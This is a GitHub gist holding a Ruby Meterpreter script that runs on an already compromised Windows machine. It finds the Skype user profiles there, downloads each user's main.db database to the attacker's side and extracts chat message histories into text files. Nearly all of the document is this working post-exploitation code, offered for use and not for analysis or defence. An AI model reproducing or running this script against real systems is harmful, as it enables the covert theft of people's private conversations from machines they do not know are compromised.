Created
March 12, 2014 00:46
-
-
Save hc0d3r/9498365 to your computer and use it in GitHub Desktop.
Meterpreter script to download main.db of users of skype
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Script to extract skype logs :-) | |
| # Author: MMxM ( hc0der.blogspot.com ) | |
| # | |
| require 'date' | |
| begin | |
| require 'sqlite3' | |
| rescue LoadError | |
| print_error("You must have installed sqlite3 gem to script work !") | |
| raise Rex::Script::Completed | |
| end | |
| def show_help(opts) | |
| print_line("\nDESCRIPTION:") | |
| print_line("\n\tScript For Download main.db of skype") | |
| print_line("\tAnd Extract Talk History") | |
| print_line(opts.usage) | |
| end | |
| opts = Rex::Parser::Arguments.new( | |
| "-h" => [ false, "Display This help menu" ], | |
| "-l" => [ true, "Set Custom Location of Skype to Extract Data From Users" ] | |
| ) | |
| location = false | |
| opts.parse(args) { |opt, idx, val| | |
| case opt | |
| when "-h" | |
| show_help(opts) | |
| raise Rex::Script::Completed | |
| when "-l" | |
| location = val | |
| end | |
| } | |
| if location == false | |
| location = client.fs.file.expand_path("%APPDATA%")+"\\Skype" | |
| end | |
| stat = client.fs.file.stat(location) rescue nil | |
| if stat == nil | |
| print_error("Directory: #{location} not found !") | |
| print_error("You can set manually skype path , using opt -l") | |
| raise Rex::Script::Completed | |
| else | |
| print_status("Extracting Users from #{location}") | |
| end | |
| users = [] | |
| client.fs.dir.foreach(location) do |us| | |
| users << us if us !~ /^(\.|\.\.|Content|DataRv|My Skype Received Files|Pictures|shared_dynco|shared_httpfe|shared.xml|dns.ldb|shared.lck)$/ | |
| end | |
| if users.any? == false | |
| print_error("No Users Found") | |
| raise Rex::Script::Completed | |
| end | |
| @info = client.sys.config.sysinfo | |
| print_status("#{users.count} User(s) Found !") | |
| print_status("#{users.join(", ")}") | |
| success_down = {} | |
| users.each do |id| | |
| print_status("Downloading main.db from user #{id}") | |
| file_name = location+"\\"+id+"\\main.db" | |
| stat = client.fs.file.stat(file_name) rescue nil | |
| if stat == nil | |
| print_error("File Not Found (#{file_name})") | |
| next | |
| end | |
| @output_dir = File.join(Msf::Config.log_directory, "scripts", "skype_history", Rex::FileUtils.clean_path(@info['Computer']), Time.now.strftime("%Y%m%d.%H%M")) | |
| ::FileUtils.mkdir_p(@output_dir) | |
| final = File.join(@output_dir, Rex::FileUtils.clean_path(id), "main.db") | |
| client.fs.file.download_file(final, file_name) | |
| print_status("Saving file to #{final}") | |
| success_down[:"#{id}"] = final | |
| end | |
| if success_down.any? == false | |
| print_status("100% complete") | |
| raise Rex::Script::Completed | |
| end | |
| print_good("Download Stage Terminated") | |
| print_good("Now Extracting Data Into txt File") | |
| success_down.each do |user,log_file| | |
| print_status("Extracting data from #{user}") | |
| begin | |
| txt_log_file = log_file+".txt" | |
| txt_file = File.new(txt_log_file,"a+") | |
| print_status("Txt Output Location: #{txt_log_file}") | |
| db = SQLite3::Database.open log_file | |
| stm = db.prepare "SELECT timestamp,author,from_dispname,body_xml,chatname FROM Messages WHERE type='61' order by timestamp" | |
| rs = stm.execute | |
| rs.each do |row| | |
| txt_file.puts Time.at(row[0]).to_s+" "+row[1]+"("+row[2]+")"+": "+row[3]+" ("+row[4]+")" | |
| end | |
| rescue SQLite3::Exception => e | |
| print_error("Exception occured: #{e}") | |
| ensure | |
| stm.close if stm | |
| db.close if db | |
| txt_file.close | |
| end | |
| end | |
| print_status("100% complete") | |
| raise Rex::Script::Completed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment